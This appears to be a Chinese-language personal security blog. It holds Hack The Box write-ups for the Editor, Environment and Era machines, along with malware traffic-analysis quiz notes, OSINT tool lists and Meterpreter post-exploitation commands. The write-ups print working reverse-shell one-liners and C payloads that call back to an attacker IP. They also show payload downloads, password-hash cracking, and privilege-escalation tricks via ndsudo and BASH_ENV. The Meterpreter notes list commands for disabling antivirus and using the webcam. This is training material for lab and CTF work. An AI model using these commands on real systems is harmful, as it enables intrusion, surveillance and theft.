        requests.get(vulnerable_endpoint, verify=False, timeout=15)
    except Exception as e:
        print(f"{WARNING_STR} {color['RED']}An error ocurred:\n{color['YELLOW']}{e}{color['NC']}")
        sys.exit(1)
    print(f"{STAR} {color['MAGENTA']}Command executed{color['NC']}")
    print("\n~Happy Hacking")

    

def main()->None:
    # Get arguments form user
    args: argparse.Namespace = parse_arguments()
    # Execute the exploit attacking the vulnerable endpoint
    exploit(args.target, args.command)


if __name__ == "__main__":
    main()

利用该脚本对网站进行反弹shell

# 首先攻击端进行端口监听
ncat -lnvp 4444
# 之后进行反弹shelll，不知道为什么加busybox的自行查阅
python CVE-2024-24893.py -t http://wiki.editor.htb/ -c 'busybox nc 10.10.16.3 4444 -e /bin/bash'
# 开启交互式终端便于操作
python3 -c 'import pty;pty.spawn("/bin/bash")'

提权

# 进入home后发现有个名为oliver的用户
cd /home

# 回到刚进来时的文件夹
cd /usr/lib/xwiki-jetty

# 通过询问gpt，可以获取相关的结构信息，找到一个名为hibernate.cfg.xml的配置文件，通过该命令发现其中存在密码，密码为
# theEd1t0rTeam99
grep passw* hibernate.cfg.xml 

# 下面尝试进行ssh连接
ssh oliver@10.10.11.80

# 发现连接成功，获得user flag
oliver@editor:~$ cat user.txt
9afa9913d95e68e660182441f4d2c3e4

# 下面尝试进行root提权，看看有没有什么是root下面执行，发现没有
oliver@editor:~$ sudo -l
[sudo] password for oliver: 
Sorry, user oliver may not run sudo on editor.

# 查看网络监听情况，发现其有若干的端口监听服务，一个一个看，进行端口转发
netstat -nutl

1 2	# 进行端口转发，这样就可以远程访问19999端口啦 ssh -L 19999:127.0.0.1:19999 oliver@10.10.11.80

发现为Netdata网站，并且进去有红色升级提醒，那就看看是否存在漏洞。

查阅后发现确实存在漏洞，编号为CVE-2024-32019。受影响的 Netdata Agent 版本附带的工具ndsudo允许攻击者以root权限运行任意程序。通过google找到了相应的POC。CVE-2024-32019-POC

# 首先按照他的POC找到该文件的位置
oliver@editor:~$ find / -name ndsudo 2>/dev/null
# 位置为
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

# 执行一下
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
nvme : not available in PATH.

// 按照他给的代码改动再次反弹shell
#include  // for setuid, setgid, execl
#include  // for NULL

int main()
{
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/10.10.16.3/9999 0>&1", NULL);
    return 0;
}

# 首先编译一下，因为我的电脑为M4版本Mac电脑，需要使用docker才能编译为x86_64的
docker run --rm --platform linux/amd64 -v "$PWD":/src -w /src ubuntu:latest bash -c "apt update && apt install -y build-essential && gcc -o nvme exploit.c -static"

# 得到nvme之后将其传入到目标机器
scp oliver@10.10.11.80

# 修改其可执行权限，并把所在目录加入到PATH
chmod +x nvme
export PATH=$(pwd):$PATH

# 执行命令 即可以root身份反弹shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

又学到了T_T

Pwned-Exploiting HTB Environment

2025-08-27T09:30:34.964Z

Environment

第一步用nmap进行扫描

1	nmap -sV -sC -Pn --min-rate 2000 10.10.11.67 --verbose

发现有22，80端口。那就访问一下80端口，发现无法访问，那就添加到/etc/hosts里面。

1	echo '10.10.11.67\environment.htb' \| sudo tee -a /etc/hosts

找一找，抓抓包，发现没什么可以利用的，那就扫下其他文件和子域名。

# 扫文件
python dirsearch.py -u http://environment.htb/
# 扫域名
ffuf -w fuzzDicts/subdomainDicts/main.txt -u http://environment.htb/ -H "Host: FUZZ.environment.htb"

域名没扫出来什么，扫出了login登陆界面，还有个upload的界面。

抓一抓login的包看看，发现删掉remeber后可以看到源代码。
f
输入其他值发现，可以看到如下源代码。当PHP环境为preprod的时候，就会以id=1的用户登录。

去找下Laravel 11.30.0有没有CVE能够修改环境的。CVE-2024-52301。

直接请求。

登录成功后可以上传文件，上传个php试试。

直接上传个反弹shell的php，之后访问该php，成功反弹shell。

提权

1 2	# 交互式终端 python3 -m 'import pty;pty.spawn("/bin/bash/")'

到处看一看，发现对hish的目录有访问的权限。可以先获取user.txt

进入到backup，发现一个keyvault.gpg文件，可能是加密过的文件。
进入.gnupg，目录丢给gpt，回答可能是私钥信息。

那就验证一下，发现查看私钥的时候没有权限，那就复制到别的地方。

之后解密一下看看。

# ssh登录一下
ssh hish@10.10.11.67 

# 登录成功后看看什么可以以root身份执行
hish@environment:~$ sudo -l
[sudo] password for hish: 
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV
    BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo


# 发现有个systeminfo 可以，查看下内容
cat /usr/bin/systeminfo
#!/bin/bash
echo -e "\n### Displaying kernel ring buffer logs (dmesg) ###"
dmesg | tail -n 10

echo -e "\n### Checking system-wide open ports ###"
ss -antlp

echo -e "\n### Displaying information about all mounted filesystems ###"
mount | column -t

echo -e "\n### Checking system resource limits ###"
ulimit -a

echo -e "\n### Displaying loaded kernel modules ###"
lsmod | head -n 10

echo -e "\n### Checking disk usage for all filesystems ###"
df -h

# 那就生成反弹shell的同名文件，发现没办法执行成功，那就把sudo -l的内容给gpt问问，有什么可以利用的。

echo 'bash -p' > exp.sh
chmod +x exp.sh
sudo BASH_ENV=./exp.sh /usr/bin/systeminfo
# 获取到root权限
root@environment:~# whoami
root

又学到了T_T

Pwned-Exploiting HTB Era

2025-08-27T09:30:34.964Z

Era

第一步用nmap进行扫描

1	nmap -sV -sC -Pn --min-rate 2000 10.10.11.79 --verbose

发现有21，80端口。那就访问一下80端口，发现无法访问，那就添加到/etc/hosts里面。

1	echo '10.10.11.79\tera.htb' \| sudo tee -a /etc/hosts

找一找，抓抓包，发现没什么可以利用的，那就扫下其他文件和子域名。

# 扫文件
python dirsearch.py -u http://era.htb/
# 扫域名
ffuf -w fuzzDicts/subdomainDicts/main.txt -u http://era.htb/ -H "Host: FUZZ.era.htb"

发现了一个file的子域名。无法访问，添加到/etc/hosts中。

1
2
3

echo '10.10.11.79\tfile.era.htb' | sudo tee -a /etc/hosts
# 扫一扫，为什么-fw 4 因为不加的话，会出现很多，那就判断Words: 4无效
ffuf -w ../fuzzDicts/subdomainDicts/main.txt -u http://era.htb/ -H "Host: FUZZ.era.htb" -fw 4

但是需要登录，那就扫扫file.era.htb看看有没有其他的文件。

1 2	# 扫扫文件 python dirsearch.py -u http://file.era.htb/

有个register.php，进去看看是不是能注册。

注册之后，可以登录。并且可以上传文件，那就上传一个脚本看看。

发现有编号。

那其实可以看看都有什么文件。

seq 4000 > num.txt

# 试了下，全是302，是不是有cookie
ffuf -u 'http://file.era.htb/download.php?id=FUZZ' -w ../../Downloads/num.txt 

# 再试下，过滤掉没有的3161，再试试
ffuf -u 'http://file.era.htb/download.php?id=FUZZ' -w ../../Downloads/num.txt -H "Cookie:PHPSESSID=iv03adftavqoviaa3q3aj9ffvn"

ffuf -u 'http://file.era.htb/download.php?id=FUZZ' -w ../../Downloads/num.txt -H "Cookie:PHPSESSID=iv03adftavqoviaa3q3aj9ffvn" -fw 3161

有两个文件被搜到，下载到本地看一看。

在site-backup里面有个数据库文件，看一看。

sqlite3 filedb.sqlite 
# 看看表
sqlite> .tables
files  users
# 看看字段，发现有密码
.schema users
CREATE TABLE users (
user_id INTEGER PRIMARY KEY AUTOINCREMENT,
user_name varchar(255) NOT NULL,
user_password varchar(255) NOT NULL,
auto_delete_files_after int NOT NULL
, security_answer1 varchar(255), security_answer2 varchar(255), security_answer3 varchar(255));
# 看看内容
SELECT * FROM users

# 那就解一下密码
echo 'admin_ef01cab31aa:$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC
eric:$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm
veronica:$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK
yuri:$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.
john:$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6
ethan:$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC' > hashes.txt

john --wordlist=../tools/rockyou.txt hashes.txt 
john --show hashes.txt
# 解出来两个
eric:america
yuri:mustang

有这两个账户登录看看，发现也没什么有用的，看看文件夹里其他的php。
security_login.php，网页登录看看。之前发现了admin账户的一些认证问题，登录看看。发现也没什么，之前有个21端口开着，看看ftp能不能登录。

# 发现yuri可以登录
ftp 10.10.11.79 
Name (10.10.11.79): yuri
331 Please specify the password.
Password: 
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 22 08:42 apache2_conf
drwxr-xr-x    3 0        0            4096 Jul 22 08:42 php8.1_conf
226 Directory send OK.

# 进去看一看 下载到本地看一看 好像也没什么可以利用的
ftp> cd apache2_conf
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            1332 Dec 08  2024 000-default.conf
-rw-r--r--    1 0        0            7224 Dec 08  2024 apache2.conf
-rw-r--r--    1 0        0             222 Dec 13  2024 file.conf
-rw-r--r--    1 0        0             320 Dec 08  2024 ports.conf
# 进入php8.1_conf看一看

ftp> cd php8.1_conf
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Jul 22 08:42 .
drwxr-xr-x    4 0        114          4096 Jul 22 08:42 ..
drwxr-xr-x    2 0        0            4096 Jul 22 08:42 build
-rw-r--r--    1 0        0           35080 Dec 08  2024 calendar.so
-rw-r--r--    1 0        0           14600 Dec 08  2024 ctype.so
-rw-r--r--    1 0        0          190728 Dec 08  2024 dom.so
-rw-r--r--    1 0        0           96520 Dec 08  2024 exif.so
-rw-r--r--    1 0        0          174344 Dec 08  2024 ffi.so
-rw-r--r--    1 0        0         7153984 Dec 08  2024 fileinfo.so
-rw-r--r--    1 0        0           67848 Dec 08  2024 ftp.so
-rw-r--r--    1 0        0           18696 Dec 08  2024 gettext.so
-rw-r--r--    1 0        0           51464 Dec 08  2024 iconv.so
-rw-r--r--    1 0        0         1006632 Dec 08  2024 opcache.so
-rw-r--r--    1 0        0          121096 Dec 08  2024 pdo.so
-rw-r--r--    1 0        0           39176 Dec 08  2024 pdo_sqlite.so
-rw-r--r--    1 0        0          284936 Dec 08  2024 phar.so
-rw-r--r--    1 0        0           43272 Dec 08  2024 posix.so
-rw-r--r--    1 0        0           39176 Dec 08  2024 readline.so
-rw-r--r--    1 0        0           18696 Dec 08  2024 shmop.so
-rw-r--r--    1 0        0           59656 Dec 08  2024 simplexml.so
-rw-r--r--    1 0        0          104712 Dec 08  2024 sockets.so
-rw-r--r--    1 0        0           67848 Dec 08  2024 sqlite3.so
-rw-r--r--    1 0        0          313912 Dec 08  2024 ssh2.so
-rw-r--r--    1 0        0           22792 Dec 08  2024 sysvmsg.so
-rw-r--r--    1 0        0           14600 Dec 08  2024 sysvsem.so
-rw-r--r--    1 0        0           22792 Dec 08  2024 sysvshm.so
-rw-r--r--    1 0        0           35080 Dec 08  2024 tokenizer.so
-rw-r--r--    1 0        0           59656 Dec 08  2024 xml.so
-rw-r--r--    1 0        0           43272 Dec 08  2024 xmlreader.so
-rw-r--r--    1 0        0           51464 Dec 08  2024 xmlwriter.so
-rw-r--r--    1 0        0           39176 Dec 08  2024 xsl.so
-rw-r--r--    1 0        0           84232 Dec 08  2024 zip.so

# 里面好多so文件，问问gpt，gpt说ssh2.so 提供了 PHP 使用 SSH 协议的能力，相当于在 PHP 里嵌入了一个迷你版的 SSH/SFTP 客户端。
# 在 PHP 脚本里，如果 ssh2 扩展已启用，可以调用一些函数，例如：
# ssh2_connect() → 建立 SSH 连接
# ssh2_auth_password() → 使用用户名/密码认证
# ssh2_exec() → 在远程服务器上执行命令
# ssh2_scp_send() / ssh2_scp_recv() → 通过 SCP 上传/下载文件
# ssh2_sftp() → 打开一个 SFTP 会话
# 看看是不是可以利用，返回去看看php文件，有个download.php，丢到gpt里面

# 管理员模式下（show=true 且 erauser=1），拼接了 $wrapper . $file，而且 $wrapper 可以是任意协议（只要 format 里包含 ://）。
# PHP 内置了很多 stream wrapper，比如：
# php://filter → 可以对文件做 base64 编码读取
# ftp:// → 可以访问 FTP 文件
# ssh2:// → 如果扩展启用，可以走 SSH
# http:// → 可以请求外部 URL（前提是 allow_url_fopen 开启）
# 这就意味着如果管理员账号能登录，就能用 format 参数结合 wrapper 访问到不在正常文件目录下的内容。
# 说明存在利用空间 反弹shell 记得末尾加； 因为每次执行，看到和files是连着的，加了之后就执行成功了
http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27printf%20KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTYuMy80NDQ0ICAwPiYxKSAm|base64%20-d|bash%27;

# 反弹成功

提权

先把linpeas传上去，执行看看哪些地方可以提权。

后面不知道咋做了，网上搜到大佬的笔记，上传pspy查看进程。

1
2
3

wget http://10.10.16.3:9999/pspy64
# 执行
pspy

丢给GPT。

CRON 任务执行
UID=0     PID=64453  | /usr/sbin/CRON -f -P 

root 用户（UID=0）运行的 CRON 守护进程
-f 表示前台运行
-P 是 CRON 的日志输出标志


bash 执行脚本
/bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1 


CRON 调用 bash 来执行 /root/initiate_monitoring.sh
输出和错误都重定向到 /opt/AV/periodic-checks/status.log
多条类似命令显示脚本被重复或周期性调用


objcopy
objcopy --dump-section .text_sig=text_sig_section.bin /opt/AV/periodic-checks/monitor

root 运行的 objcopy 命令
从 /opt/AV/periodic-checks/monitor 可执行文件中导出 .text_sig 段到 text_sig_section.bin
可能是 AV 或监控程序用来验证二进制完整性

监控程序
/opt/AV/periodic-checks/monitor
AV 或监控程序自身执行
可能由 CRON 脚本触发

关键就是以root权限执行咱们反弹shell，那就先编写一个可执行的文件

# so文件
file monitor
monitor: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=45a4bb1db5df48dcc085cc062103da3761dd8eaf, for GNU/Linux 3.2.0, not stripped

# 写到ex.c文件中
#include  
int main() { 
    system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.3/5555 0>&1'"); 
    return 0; 
}

gcc ex.c -o ex

# 再把ex传到目标机器
wget http://10.10.16.3:9999/ex 

# 获取.text_sig字段
objcopy --dump-section .text_sig=text_sig_section.bin /opt/AV/periodic-checks/monitor
# 添加字段
objcopy --add-section .text_sig=text_sig_section.bin ex

rm monitor
mv ex monitor
# 同时启动端口监听
ncat -lvnp 5555

Ncat: Version 7.97 ( https://nmap.org/ncat )
Ncat: Listening on [::]:5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.11.79:38388.
bash: cannot set terminal process group (65499): Inappropriate ioctl for device
bash: no job control in this shell
root@era:~# ls
answers.sh
clean_monitor.sh
initiate_monitoring.sh
monitor
root.txt
text_sig_section.bin
root@era:~# cat root.txt
05ee929a181ae44e2282d82ff12eb7ba

又学到了T_T

Finding Gozi - Unit 42 Wireshark Quiz, March 2023

2024-05-08T13:23:26.000Z

Unit 42 Wireshark Quiz, March 2023

学习记录

请求流

首先看一下请求流都有啥东西

发现一个请求

追踪后其请求了zip文件

`ZIP`文件分析

在虚拟机中将zip文件导出

其文件内包含了一个URI，该URI是以file为开头的，那么就会产生SMB流量

`SMB`流量分析

那就导出SMB流量传输的文件，发现文件并不是完全的，那就无法分析

感染流量分析

查看在请求ZIP文件之后的HTTP流量，发现其又请求了四个rar文件

流被加密，无法查看，且传输的是加密过的二进制文件

知识

参考

Finding Gozi: Answers to Unit 42 Wireshark Quiz, March 2023

Crossing the Line - Unit 42 Wireshark Quiz for RedLine Stealer

2024-04-28T02:16:20.000Z

Unit 42 Wireshark Quiz for RedLine Stealer

学习记录

查看主机名

HTTP流

首先查看HTTP

发现没什么东西

其他TCP

利用命令tcp.flags eq 0x002 and !(tcp.port eq 443) and !(tcp.port eq 80) and !(ip.dst == 10.7.10.0/24)查看目的地址非局域网的SYN包

发现C2服务器要求受害者主句提供各种类型的用户信息

还有一些其他的KEY

受害者主机传输png图片

将数据下载，查看图片为

还传输了进程信息，主机配置，以及一些登录凭证

知识

参考

Crossing the Line: Unit 42 Wireshark Quiz for RedLine Stealer

OSINT

2024-04-20T06:09:55.000Z

OSINT

收集域名信息

sublist3r利用OSINT技术枚举主域名的所有子域名

Maltego提取互联网上公开资料来收集个人信息

OSRFramework用于执行开源情报计划的工具

usufy用于多搜索引擎搜索、识别URL中的关键字，并自动列举和CSV格式存储所有结果
mailfy通过API调用在havaibeenpawned.com自动搜索
searchfy在Facebook、Github、Instagram、Twitter和Youtube中搜索关键词
Passive Total针对任何特定目标域名提供OSINT能力的另一个平台

网络爬虫

theHarvester脚本，进行搜索

获取用户信息

TinEye提供在线反向图像搜索门户网站
Shodan
SpiderFoot
Spyse
ZoomEye

Google Hacking 数据库

用户密码列表

cupp生成密码字典

自定义密码破解字典

CeWL给定URL进行指定深度的爬取，返回一个字典列表用于密码破解

twofi从Twitter提取字典

CONTACT FORMS CAMPAIGN PUSHES SSLOAD MALWARE AS EARLY AS THURSDAY 2024-04-11

2024-04-17T12:30:44.000Z

2024-04-15 (MONDAY): CONTACT FORMS CAMPAIGN PUSHES SSLOAD MALWARE AS EARLY AS THURSDAY 2024-04-11

该流量为感染流量

学习记录

HTTP流

首先看到HTTP为主要流量，且UA为SSLoad也就是题目所提出的SSLOAD恶意软件，可以看出其向HOST为85.239.53.219发出请求，响应了crypted_dll.bin二进制文件

随后受害主机便POST自身IP、域名、系统信息等

随后又进行了一系列动作后，便保持连接

原作者分析记录

INFECTION CHAIN:

email generated by contact form of targeted organization’s website –> URL from email –> fake Azure page –> Firebase URL –> downloaded .js file –> user double-clicks .js file, which is run by wscript.exe –> downloads and runs .msi hosted on WebDAV server –> .msi installs and runs SSLoad malware –> SSLoad malware loads and runs encrypted payload –> post-infection checkin traffic

EXAMPLE OF URL FROM CONTACT FORM EMAIL SUBMITTED TO VIRUSTOTAL:

http://mmtixmm.org/65629679a60671570e93799683b05/case49308469q2097/court/out/367910732497/documents?t017538i87=0535008152&i=qz&dmc=www.scotchblue.com&4666842q3&cmp=horvitzlevy&4721702y0

ASSOCIATED FAKE AZURE DOWNLOAD PAGE:

https://mebumau.org/?4666842q3&4721702y0&cmp=horvitzlevy&dmc=www.scotchblue.com&i=qz&t017538i87=0535008152

EXAMPLES OF FIREBASESTORAGE URLS FOR JS DOWNLOAD:

SHA256 EXAMPLES OF DOWNLOADED .JS FILES:

93a215b08cce42249341816df7a85edac12d4bcef166b15da64bb238637f6e76 Letter_b23_98b161159-63t511248325-3676a8.js
5fb093a9348fcf4a81befda978c948796a8319fcabe7899c2cf5ba1419ec9d35 Letter_u79_20w517865-65u0451500340-7186n6.js

ABOVE .JS FILES RETRIEVE MSI FILE FROM THE FOLLOWING URL:

file:\globalsolutionunlimitedltd.com@80\share\sharepoint.msi

DOWNLOADED MSI FILE:

SHA256 hash: 90f1511223698f33a086337a6875db3b5d6fbcce06f3195cdd6a8efa90091750
File size: 1,725,952 bytes
File location: file:\globalsolutionunlimitedltd.com@80\share\sharepoint.msi <– No longer online
Sample available at: https://bazaar.abuse.ch/sample/90f1511223698f33a086337a6875db3b5d6fbcce06f3195cdd6a8efa90091750/

SSLOAD DLL INSTALLED AND RUN BY THE ABOVE MSI FILE:

SHA256 hash: 09ffc4188bf11bf059b616491fcb8a09a474901581f46ec7f2c350fbda4e1e1c
File size: 718.848 bytes
File location: C:\Users[username]\AppData\Local\sharepoint\MenuEx.dll
Run method: regsvr32.exe /s [filename]
Sample available at: https://bazaar.abuse.ch/sample/09ffc4188bf11bf059b616491fcb8a09a474901581f46ec7f2c350fbda4e1e1c/
Note: This malware is kept persistent by a scheduled task.

POST-INFECTION TRAFFIC:

https://t.me/+st2YadnCIU1iNmQy
85.239.53.219 port 80 - 85.239.53.219 - GET /api/g <– encrypted payload
port 443 - api.ipify.org - HTTPS traffic
85.239.53.219 port 80 - 85.239.53.219 - POST /api/gateway HTTP/1.1 , JSON (application/json)
85.239.53.219 port 80 - 85.239.53.219 - POST /api/b0408631-d621-61e4-7035-f7d17fc50af8/tasks HTTP/1.1
85.239.53.219 port 80 - 85.239.53.219 - GET /download?id=Cosmos&module=2&filename=None HTTP/1.1

知识

参考

Post-exploitation attack

2024-04-15T09:04:23.000Z

Privilege escalation

纵向提权 and 横向提权
Windows命令行

1 2	shell whoami /groups

当前组为Mandatory Label\Medium Mandatory Level，为标准用户

那么就需要升到管理员权限，也就是Mandatory Lable\High Mandatory Level

getuid查看已经获得的权限

并尝试使用getsystem发现失败了

进入shell使用systeminfo看看打了哪些补丁

尽量使用最新的的EXP进行提权

show options

set session 1

貌似没成功

Post-exploitation attack

2024-04-15T07:20:19.000Z

Information gathering

进程迁移

在获得Meterpreter Shell后，如何进行下一步

使用命令ps查看正在运行的进程

使用getpid查看Meterpreter Shell的进程号

进程迁移：之后使用migrate命令将Shell移动到其他进程里面，或者使用

1	run post/windows/manage/migrate

系统自动寻找合适的进程进行迁移

系统命令

sysinfo命令查看目标机的系统信息
使用命令

1	run post/windows/gather/checkvm

来查看目标机是否运行再虚拟机上

命令idletime查看目标机最近运行时间

命令route查看路由信息

命令getuid查看当前目标机器上已经渗透成功的用户名

命令

1	run post/windows/manage/killav

关闭目标机系统杀毒软件

命令

1	run post/windows/manage/enable_rdp

启用目标机的远程桌面协议 3389端口

命令

1	run post/windows/manage/autoroute

查看目标机本地子网情况

使用background将Meterpreter终端隐藏在后台，之后使用route add添加路由，可以使用route print查看

命令

1	run post/windows/gather/enum_logged_on_users

列举当前多少用户登陆了目标机

命令

1	run post/windows/gather/enum_applications

列举装在目标机上的应用

命令

1	run windows/gather/credentials/windows_autologin

可以抓取自动登录的用户名和密码

屏幕截图命令

1 2	load espia screengrab

1	screenshot

命令

1	webcam_list

查看有没有摄像头

命令

1	webcam_snap

拍摄

命令

1	webcam_stream

开启直播
命令

shell

进入目标机Shell

文件系统命令

pwd # 目标机目录
get lwd # 查看当前处于本地哪个目录
ls
cd 
search -f *.txt -d c:\ # 查看C盘中所有以.txt为拓展名的文件
download c:\xxx /root # 将特定文件下载
upload /root c: # 将文件上传

被加密的WIFI

2024-04-14T07:26:58.000Z

2024-04-14 看雪CTF Misc 被加密的WIFI

学习记录

WLAN服务介绍

WLAN（Wireless Local Area Network，无线局域网）服务是一种无线网络技术，用于在局域网范围内提供无线连接。它通过无线信号传输数据，使设备能够在范围内进行通信和共享资源，而无需使用传统的有线连接

常用术语[1]

客户端
带有无线网卡的PC或便携式笔记本电脑等终端
AP（Access Point，接入点）
AP提供无线客户端到局域网的桥接功能，在无线客户端与无线局域网之间进行无线到有线和有线到无线的帧转换
AC（Access Controller，无线控制器）
无线控制器对无线局域网中的所有AP进行控制和管理。无线控制器还可以通过同认证服务器交互信息，来为WLAN用户提供认证服务
FAT AP
一种控制和管理无线客户端的无线设备。帧在客户端和LAN之间传输需要经过无线到有线以及有线到无线的转换，而FAT AP在这个过程中起到了桥梁的作用
无线介质
无线介质是用于在无线用户间传输帧的介质。WLAN系统使用无线射频作为传输介质

交互过程[2]

WLAN扫描方式

被动扫描：
- 被动扫描是指无线设备在接收模式下监听无线信道，记录周围所有发送信号的信息。
- 当设备处于被动扫描模式时，它只是收集附近无线网络的信息，而不发送任何请求。
- 被动扫描通常用于无线网络管理、监视和数据收集。
主动扫描：
- 主动扫描是指无线设备发送特殊的扫描请求信号，以搜索附近的无线网络。
- 在主动扫描中，设备会广播一个扫描请求，周围的无线接入点（AP）会收到请求并回复包含它们的SSID（服务集标识符）和其他信息的信标帧。
- 设备根据接收到的响应确定可用的无线网络，并显示给用户或自动连接到最适合的网络。

AP

AP（接入点）作为无线局域网（WLAN）的核心组件之一，每隔一段时间会执行多项任务以确保网络的稳定性、性能和安全性。首先，它会定期广播信标帧，通知附近设备网络的存在和基本信息，帮助设备找到并连接到该网络。同时，AP会监视连接状态和信道质量，定期检查连接设备的状态并维持连接的稳定性，以及监视所在信道的质量并根据需要调整通信参数。此外，AP会定期更新配置信息，从网络管理系统获取最新的设置和安全策略，并执行漫游决策以提供最佳的用户体验。最后，AP还会定期监视网络安全性，确保网络没有异常活动或潜在的安全威胁。综上所述，AP通过执行这些任务，有效地管理和维护 WLAN，以满足用户的需求并提供可靠的无线连接。

广播流量

利用命令wlan.fc.type_subtype == 0x08过滤出WLAN流量的广播包

WLAN认证方式

开放系统认证（Open System Authentication）：这是最基本的认证方式，设备可以连接到网络而无需提供任何凭据。它提供了最低级别的安全性，因为任何设备都可以连接到网络。
共享密钥认证（Shared Key Authentication）：在这种认证方式中，接入点要求连接的设备提供与接入点预先共享的密钥进行认证。虽然这比开放系统认证提供了一定程度的安全性，但它已被证明是不安全的，并已不推荐使用。
WPA/WPA2-PSK（Wi-Fi Protected Access Pre-Shared Key）：这是一种基于预共享密钥的个人级别的认证方式。用户在连接到网络之前需要输入预共享密钥（也称为密码）。WPA/WPA2-PSK 提供了更强的安全性，因为通信过程中使用了加密的会话密钥。

WPA/WPA2-PSK（Pre-Shared Key）：
- 这是个人级别的认证方式，也称为WPA-PSK或WPA2-PSK。
- 用户需要在连接到网络之前输入预共享密钥（也称为密码）。
- 预共享密钥用于生成会话密钥，用于加密数据传输。
- WPA2-PSK相比WPA-PSK提供了更强大的加密算法，如AES（Advanced Encryption Standard）。

MAC地址过滤：在这种认证方式中，接入点根据设备的MAC地址来控制允许连接到网络的设备。只有在接入点允许的设备MAC地址列表中的设备才能连接到网络。

其他方式请自行查询

WLAN关联

设备向选择的接入点发送关联请求，请求加入网络，接入点对请求进行身份验证和认证，并在成功后为设备分配IP地址。一旦确认响应收到，关联完成，设备便可以在无线网络中进行数据传输和通信。
当接入点（AP）收到关联请求（Association Request）时，首先会验证请求的有效性，包括身份验证信息和认证方式。接着，AP会检查请求中的休眠参数，如Listen Interval，以了解STA的休眠模式，并根据需要处理帧的存储和转发。如果AP有足够的资源来处理新的关联请求，它将为STA分配资源并暂存任何需要发送给STA的帧。然后，AP会发送关联响应（Association Response），如果成功处理了关联请求，它会指示STA可以成功连接到网络。然而，如果AP无法为STA分配足够的资源，它可能会返回一个失败的关联响应，指示连接失败。在处理关联请求时，AP需要平衡资源容量和网络性能，以确保为所有连接的STA提供足够的资源和服务。

WLAN关联成果后四次握手

WiFi 四次握手分析

流量分析

通过查看HTTP流，发现其传输了密码，博主运气好，只看了一条流，就看到了密码

利用airdecap.ng工具对pcap包进行解密

之后对解密后的包进行分析，看看是不是藏在图片里，或者其他文件里，找了一圈发现没有

那就直接搜索flag，还真有

对flag%7Buse_a_strong_pass%7D进行解码得到flag{use_a_strong_pass}

嘿嘿，对了，我还以为很复杂呢，下面这个是在搜索过程中发现的，大家也可以看一看
一道关于无线网络和隐写的CTF

参考

[1]https://www.h3c.com/cn/d_200812/622875_473262_0.htm
[2]https://community.nxp.com/t5/Wireless-Connectivity-Knowledge/802-11-Wi-Fi-Connection-Disconnection-process/ta-p/1121148
[3]https://blog.csdn.net/random_run/article/details/115223124

TRAFFIC ANALYSIS EXERCISE - FRANK-N-TED (WHAT'S GOING ON?)

2024-04-14T02:02:44.000Z

2020-06-12 - TRAFFIC ANALYSIS EXERCISE - FRANK-N-TED (WHAT’S GOING ON?)

学习记录

HTTP流

首先查看HTTP流，然后追踪第一条流

提示document被转移，猜测用户访问http://cardboardspaceshiptoys.com/logs/invoice-86495.doc后，又点击https://cardboardspaceshiptoys.com/logs/invoice-86495.doc

随后追踪后两条HTTP流

发现在GET http://205.185.125.104/files/june11.dll后，响应了一个可执行文件

随后对http://snnmnkxdhflwgthqismb.com/post.php进行了一系列POST REQUEST

利用virustotal查询域名snnmnkxdhflwgthqismb.com

在虚拟机中导出.dll文件，并计算其sha256值，并进行查询，其为恶意软件

加密流

利用tls.handshake.type eq 1过滤条件查询握手信息，好像没什么信息

线索梳理

Environment（调查的资产信息/环境）
- LAN segment range:10.6.12.0/24
- Domain:frank-n-ted.com
- Domain controller:frank-n-ted-dc-10.6.12.12
- LAN segment gateway:10.6.12.1
- LAN segment broadcast address:10.6.12.255
Incident Report
- Executive summary:
  LAPTOP-5WKHX9YG的用户frank.brokowski访问http://205.185.125.104/files/june11.dll被感染
- Victim details
  - IP address:10.6.12.203
  - MAC address:Intel_6d:fc:e2 (84:3a:4b:6d:fc:e2)
  - User account name:frank.brokowsk
- Indicators of compromise (IOCs)
  - SHA256 hash:d36366666b407fe5527b96696377ee7ba9b609c8ef4561fa76af218ddd764dec
  - File size:563,032 字节
  - File name:june11.dll
  - File location:http://205.185.125.104/files/june11.dll
  - File description:恶意程序
- HTTP traffic to retrieve the malware
  3302 2020-06-13 01:15:19.658851 10.6.12.203 205.185.125.104 HTTP 205.185.125.104 GET /files/june11.dll HTTP/1.1 http (80) 49739 (49739) 312 Intel_6d:fc:e2 Cisco_29:41:7d
- HTTP traffic for remote request infection activity
